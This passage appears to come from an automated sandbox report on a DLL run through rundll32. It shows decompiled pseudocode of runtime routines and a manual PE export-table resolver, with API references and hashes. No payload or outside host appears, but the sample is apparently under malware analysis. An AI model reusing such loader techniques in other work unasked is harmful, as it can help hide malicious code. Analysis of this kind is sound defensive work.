                                                                                                                                                                            • Opcode Fuzzy Hash: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
                                                                                                                                                                            • Instruction Fuzzy Hash: 3901C0B6A00228ABE711DB65DCC4FDF77ACEF18790F110065EA45D7141DA70DE848BA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E10010C0F(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                            				intOrPtr _v0;
                                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				struct HINSTANCE__* _t16;
                                                                                                                                                                            				_Unknown_base(*)()* _t17;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            				void* _t26;
                                                                                                                                                                            				void* _t28;
                                                                                                                                                                            
                                                                                                                                                                            				_t28 = __eflags;
                                                                                                                                                                            				_t24 = __edi;
                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                            				E1001431B(__ebx, _t25, __ebp, 0xc);
                                                                                                                                                                            				_push(E100100DE);
                                                                                                                                                                            				_t26 = E100139F5(__ebx, 0x1005a8e0, __edi, _t25, _t28);
                                                                                                                                                                            				_t29 = _t26;
                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                            					E1000A0DB(_t21, 0x1005a8e0, __edi, _t26, _t29);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t30 =  *(_t26 + 8);
                                                                                                                                                                            				if( *(_t26 + 8) != 0) {
                                                                                                                                                                            					L7:
                                                                                                                                                                            					E10014388(0xc);
                                                                                                                                                                            					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_push("hhctrl.ocx");
                                                                                                                                                                            					_t16 = E1000E725(_t21, 0x1005a8e0, _t24, _t26, _t30);
                                                                                                                                                                            					 *(_t26 + 4) = _t16;
                                                                                                                                                                            					if(_t16 != 0) {
                                                                                                                                                                            						_t17 = GetProcAddress(_t16, "HtmlHelpA");
                                                                                                                                                                            						__eflags = _t17;
                                                                                                                                                                            						 *(_t26 + 8) = _t17;
                                                                                                                                                                            						if(_t17 != 0) {
                                                                                                                                                                            							goto L7;
                                                                                                                                                                            						}
                                                                                                                                                                            						FreeLibrary( *(_t26 + 4));
                                                                                                                                                                            						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
                                                                                                                                                                            					}
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            			}











                                                                                                                                                                            0x10010c0f
                                                                                                                                                                            0x10010c0f
                                                                                                                                                                            0x10010c0f
                                                                                                                                                                            0x10010c12
                                                                                                                                                                            0x10010c17
                                                                                                                                                                            0x10010c26
                                                                                                                                                                            0x10010c28
                                                                                                                                                                            0x10010c2a
                                                                                                                                                                            0x10010c2c
                                                                                                                                                                            0x10010c2c
                                                                                                                                                                            0x10010c31
                                                                                                                                                                            0x10010c35
                                                                                                                                                                            0x10010c6f
                                                                                                                                                                            0x10010c71
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10010c37
                                                                                                                                                                            0x10010c37
                                                                                                                                                                            0x10010c3c
                                                                                                                                                                            0x10010c44
                                                                                                                                                                            0x10010c47
                                                                                                                                                                            0x10010c53
                                                                                                                                                                            0x10010c59
                                                                                                                                                                            0x10010c5b
                                                                                                                                                                            0x10010c5e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10010c63
                                                                                                                                                                            0x10010c69
                                                                                                                                                                            0x10010c69
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10010c49

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
                                                                                                                                                                              • Part of subcall function 1001431B: InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
                                                                                                                                                                              • Part of subcall function 1001431B: LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
                                                                                                                                                                              • Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F
                                                                                                                                                                              • Part of subcall function 100139F5: __EH_prolog3_catch.LIBCMT ref: 100139FC
                                                                                                                                                                              • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                                                                                              • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 10010C53
                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 10010C63
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                                                                            • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                                                            • API String ID: 2853499158-63838506
                                                                                                                                                                            • Opcode ID: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
                                                                                                                                                                            • Instruction ID: 8873b40b3358b87e9332ca8c9146562190e137befea279647b799a71fcd87530
                                                                                                                                                                            • Opcode Fuzzy Hash: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
                                                                                                                                                                            • Instruction Fuzzy Hash: 7001F431204303DFE321DFA1DE05B4A76E0EF05781F018A08F4DAA8061DBB1D8D0DBA2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                            			E100224E9() {
                                                                                                                                                                            				signed long long _v12;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed long long _v28;
                                                                                                                                                                            				signed char _t8;
                                                                                                                                                                            
                                                                                                                                                                            				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                            					L6:
                                                                                                                                                                            					_v20 =  *0x1002bb98;
                                                                                                                                                                            					_v28 =  *0x1002bb90;
                                                                                                                                                                            					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                            					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                            					asm("fld1");
                                                                                                                                                                            					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                            					asm("fnstsw ax");
                                                                                                                                                                            					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                            						return 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						return 1;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                            					if(__eax == 0) {
                                                                                                                                                                            						goto L6;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_push(0);
                                                                                                                                                                            						return __eax;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}







                                                                                                                                                                            0x100224ee
                                                                                                                                                                            0x100224f6
                                                                                                                                                                            0x1002250d
                                                                                                                                                                            0x100224b9
                                                                                                                                                                            0x100224c2
                                                                                                                                                                            0x100224ce
                                                                                                                                                                            0x100224d1
                                                                                                                                                                            0x100224d4
                                                                                                                                                                            0x100224d6
                                                                                                                                                                            0x100224d9
                                                                                                                                                                            0x100224de
                                                                                                                                                                            0x100224e8
                                                                                                                                                                            0x100224e0
                                                                                                                                                                            0x100224e4
                                                                                                                                                                            0x100224e4
                                                                                                                                                                            0x100224f8
                                                                                                                                                                            0x100224fe
                                                                                                                                                                            0x10022506
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10022508
                                                                                                                                                                            0x10022508
                                                                                                                                                                            0x1002250c
                                                                                                                                                                            0x1002250c
                                                                                                                                                                            0x10022506

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,1001A130), ref: 100224EE
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 100224FE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                                                                            • Opcode ID: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
                                                                                                                                                                            • Instruction ID: b1380c49f8d15cda8b98f9f56e3724ed638b8beb480886d8724856f67b077174
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
                                                                                                                                                                            • Instruction Fuzzy Hash: EDF03030900D1EE2EF00ABE1BC596AF7A78FB44785FD20490E681B0088DF7181718681
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10002D50(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				intOrPtr* _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				intOrPtr* _v32;
                                                                                                                                                                            				signed short* _v36;
                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                            				void* _t79;
                                                                                                                                                                            				void* _t119;
                                                                                                                                                                            
                                                                                                                                                                            				_v40 = __ecx;
                                                                                                                                                                            				_v20 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                            				_v16 =  *_a4 + 0x78;
                                                                                                                                                                            				if( *((intOrPtr*)(_v16 + 4)) != 0) {
                                                                                                                                                                            					_v8 = _v20 +  *_v16;
                                                                                                                                                                            					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
                                                                                                                                                                            						SetLastError(0x7f);
                                                                                                                                                                            						return 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
                                                                                                                                                                            							_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x20));
                                                                                                                                                                            							_v36 = _v20 +  *((intOrPtr*)(_v8 + 0x24));
                                                                                                                                                                            							_v24 = 0;
                                                                                                                                                                            							_v28 = 0;
                                                                                                                                                                            							while(_v28 <  *((intOrPtr*)(_v8 + 0x18))) {
                                                                                                                                                                            								_t79 = E10001F70(_a8, _v20 +  *_v32);
                                                                                                                                                                            								_t119 = _t119 + 8;
                                                                                                                                                                            								if(_t79 != 0) {
                                                                                                                                                                            									_v28 = _v28 + 1;
                                                                                                                                                                            									_v32 = _v32 + 4;
                                                                                                                                                                            									_v36 =  &(_v36[1]);
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            								_v12 =  *_v36 & 0x0000ffff;
                                                                                                                                                                            								_v24 = 1;
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_v24 != 0) {
                                                                                                                                                                            								L17:
                                                                                                                                                                            								if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
                                                                                                                                                                            									return _v20 +  *((intOrPtr*)(_v20 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
                                                                                                                                                                            								}
                                                                                                                                                                            								SetLastError(0x7f);
                                                                                                                                                                            								return 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							SetLastError(0x7f);
                                                                                                                                                                            							return 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
                                                                                                                                                                            							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                            							goto L17;
                                                                                                                                                                            						}
                                                                                                                                                                            						SetLastError(0x7f);
                                                                                                                                                                            						return 0;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				SetLastError(0x7f);
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}














                                                                                                                                                                            0x10002d56
                                                                                                                                                                            0x10002d5f
                                                                                                                                                                            0x10002d62
                                                                                                                                                                            0x10002d71
                                                                                                                                                                            0x10002d7b
                                                                                                                                                                            0x10002d94
                                                                                                                                                                            0x10002d9e
                                                                                                                                                                            0x10002dab
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002db8
                                                                                                                                                                            0x10002dc3
                                                                                                                                                                            0x10002e0b
                                                                                                                                                                            0x10002e17
                                                                                                                                                                            0x10002e1a
                                                                                                                                                                            0x10002e21
                                                                                                                                                                            0x10002e45
                                                                                                                                                                            0x10002e5d
                                                                                                                                                                            0x10002e62
                                                                                                                                                                            0x10002e67
                                                                                                                                                                            0x10002e30
                                                                                                                                                                            0x10002e39
                                                                                                                                                                            0x10002e42
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002e42
                                                                                                                                                                            0x10002e6f
                                                                                                                                                                            0x10002e72
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002e72
                                                                                                                                                                            0x10002e81
                                                                                                                                                                            0x10002e8f
                                                                                                                                                                            0x10002e98
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002eb5
                                                                                                                                                                            0x10002e9c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002ea2
                                                                                                                                                                            0x10002e85
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002e8b
                                                                                                                                                                            0x10002dd7
                                                                                                                                                                            0x10002dfa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002dfa
                                                                                                                                                                            0x10002ddb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002de1
                                                                                                                                                                            0x10002d9e
                                                                                                                                                                            0x10002d7f
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 10002D7F
                                                                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 10002DAB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                            • Opcode ID: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
                                                                                                                                                                            • Instruction ID: 028074866867044f4bb64f701422ec5252acdb94d91fdee864382ef112f730bb
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
                                                                                                                                                                            • Instruction Fuzzy Hash: F7510570A4415AEFEF04CF94C880AAEB7F1FF48384F608569D855AB349D734EA41DB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10023E83(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                            				char _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				char _v20;
                                                                                                                                                                            				char _t43;
                                                                                                                                                                            				char _t46;
                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                                            				int _t58;
                                                                                                                                                                            				signed short* _t59;
                                                                                                                                                                            				short* _t60;
                                                                                                                                                                            				int _t65;
                                                                                                                                                                            				char* _t72;
                                                                                                                                                                            
                                                                                                                                                                            				_t72 = _a8;
                                                                                                                                                                            				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                            					L5:
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					if( *_t72 != 0) {
                                                                                                                                                                            						E10016E2B( &_v20, __edi, _a16);
                                                                                                                                                                            						_t43 = _v20;
                                                                                                                                                                            						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                            						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                            							_t46 = E1001E243( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                            							if(_t46 == 0) {
                                                                                                                                                                            								__eflags = _a4;
                                                                                                                                                                            								_t40 = _v20 + 4; // 0x840ffff8
                                                                                                                                                                            								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									L10:
                                                                                                                                                                            									__eflags = _v8;
                                                                                                                                                                            									if(_v8 != 0) {
                                                                                                                                                                            										_t53 = _v12;
                                                                                                                                                                            										_t11 = _t53 + 0x70;
                                                                                                                                                                            										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                            										__eflags =  *_t11;
                                                                                                                                                                            									}
                                                                                                                                                                            									return 1;
                                                                                                                                                                            								}
                                                                                                                                                                            								L21:
                                                                                                                                                                            								_t54 = E10017D62(__eflags);
                                                                                                                                                                            								 *_t54 = 0x2a;
                                                                                                                                                                            								__eflags = _v8;
                                                                                                                                                                            								if(_v8 != 0) {
                                                                                                                                                                            									_t54 = _v12;
                                                                                                                                                                            									_t33 = _t54 + 0x70;
                                                                                                                                                                            									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                            									__eflags =  *_t33;
                                                                                                                                                                            								}
                                                                                                                                                                            								return _t54 | 0xffffffff;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t56 = _v20;
                                                                                                                                                                            							_t15 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                            							_t65 =  *_t15;
                                                                                                                                                                            							__eflags = _t65 - 1;
                                                                                                                                                                            							if(_t65 <= 1) {
                                                                                                                                                                            								L17:
                                                                                                                                                                            								_t24 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                            								__eflags = _a12 -  *_t24;
                                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                                            									goto L21;
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _t72[1];
                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                            									goto L21;
                                                                                                                                                                            								}
                                                                                                                                                                            								L19:
                                                                                                                                                                            								__eflags = _v8;
                                                                                                                                                                            								_t27 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                            								_t57 =  *_t27;
                                                                                                                                                                            								if(_v8 == 0) {
                                                                                                                                                                            									return _t57;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                            								return _t57;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _a12 - _t65;
                                                                                                                                                                            							if(_a12 < _t65) {
                                                                                                                                                                            								goto L17;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _a4;
                                                                                                                                                                            							_t21 = _t56 + 4; // 0x840ffff8
                                                                                                                                                                            							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                            							__eflags = _t58;
                                                                                                                                                                            							_t56 = _v20;
                                                                                                                                                                            							if(_t58 != 0) {
                                                                                                                                                                            								goto L19;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L17;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t59 = _a4;
                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                            						if(_t59 != 0) {
                                                                                                                                                                            							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L10;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t60 = _a4;
                                                                                                                                                                            						if(_t60 != 0) {
                                                                                                                                                                            							 *_t60 = 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}

















                                                                                                                                                                            0x10023e8b
                                                                                                                                                                            0x10023e92
                                                                                                                                                                            0x10023ea7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023e99
                                                                                                                                                                            0x10023e9b
                                                                                                                                                                            0x10023eb3
                                                                                                                                                                            0x10023eb8
                                                                                                                                                                            0x10023ebb
                                                                                                                                                                            0x10023ebe
                                                                                                                                                                            0x10023ee7
                                                                                                                                                                            0x10023eec
                                                                                                                                                                            0x10023ef0
                                                                                                                                                                            0x10023f71
                                                                                                                                                                            0x10023f83
                                                                                                                                                                            0x10023f8c
                                                                                                                                                                            0x10023f8e
                                                                                                                                                                            0x10023ece
                                                                                                                                                                            0x10023ece
                                                                                                                                                                            0x10023ed1
                                                                                                                                                                            0x10023ed3
                                                                                                                                                                            0x10023ed6
                                                                                                                                                                            0x10023ed6
                                                                                                                                                                            0x10023ed6
                                                                                                                                                                            0x10023ed6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023edc
                                                                                                                                                                            0x10023f50
                                                                                                                                                                            0x10023f50
                                                                                                                                                                            0x10023f55
                                                                                                                                                                            0x10023f5b
                                                                                                                                                                            0x10023f5e
                                                                                                                                                                            0x10023f60
                                                                                                                                                                            0x10023f63
                                                                                                                                                                            0x10023f63
                                                                                                                                                                            0x10023f63
                                                                                                                                                                            0x10023f63
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023f67
                                                                                                                                                                            0x10023ef2
                                                                                                                                                                            0x10023ef5
                                                                                                                                                                            0x10023ef5
                                                                                                                                                                            0x10023efb
                                                                                                                                                                            0x10023efe
                                                                                                                                                                            0x10023f25
                                                                                                                                                                            0x10023f28
                                                                                                                                                                            0x10023f28
                                                                                                                                                                            0x10023f2e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023f30
                                                                                                                                                                            0x10023f33
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023f35
                                                                                                                                                                            0x10023f35
                                                                                                                                                                            0x10023f38
                                                                                                                                                                            0x10023f38
                                                                                                                                                                            0x10023f3e
                                                                                                                                                                            0x10023eac
                                                                                                                                                                            0x10023eac
                                                                                                                                                                            0x10023f47
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023f47
                                                                                                                                                                            0x10023f00
                                                                                                                                                                            0x10023f03
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023f07
                                                                                                                                                                            0x10023f15
                                                                                                                                                                            0x10023f18
                                                                                                                                                                            0x10023f1e
                                                                                                                                                                            0x10023f20
                                                                                                                                                                            0x10023f23
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023f23
                                                                                                                                                                            0x10023ec0
                                                                                                                                                                            0x10023ec3
                                                                                                                                                                            0x10023ec5
                                                                                                                                                                            0x10023ecb
                                                                                                                                                                            0x10023ecb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023e9d
                                                                                                                                                                            0x10023e9d
                                                                                                                                                                            0x10023ea2
                                                                                                                                                                            0x10023ea4
                                                                                                                                                                            0x10023ea4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10023ea2
                                                                                                                                                                            0x10023e9b

                                                                                                                                                                            APIs
                                                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10023EB3
                                                                                                                                                                            • __isleadbyte_l.LIBCMT ref: 10023EE7
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F18
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F86
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3058430110-0
                                                                                                                                                                            • Opcode ID: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
                                                                                                                                                                            • Instruction ID: bc0a73e0192d900c1d89498958e44598309ec6eeb61669affd2269eacaf1277d
                                                                                                                                                                            • Opcode Fuzzy Hash: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
                                                                                                                                                                            • Instruction Fuzzy Hash: EA319931A0028AEFDF50DFA4E891AAE7BF9EF00251F92C5A9F4648B191D330E944DB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                            			E100145B9(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                            				intOrPtr _t37;
                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                            				void* _t47;
                                                                                                                                                                            				intOrPtr* _t48;
                                                                                                                                                                            				void* _t50;
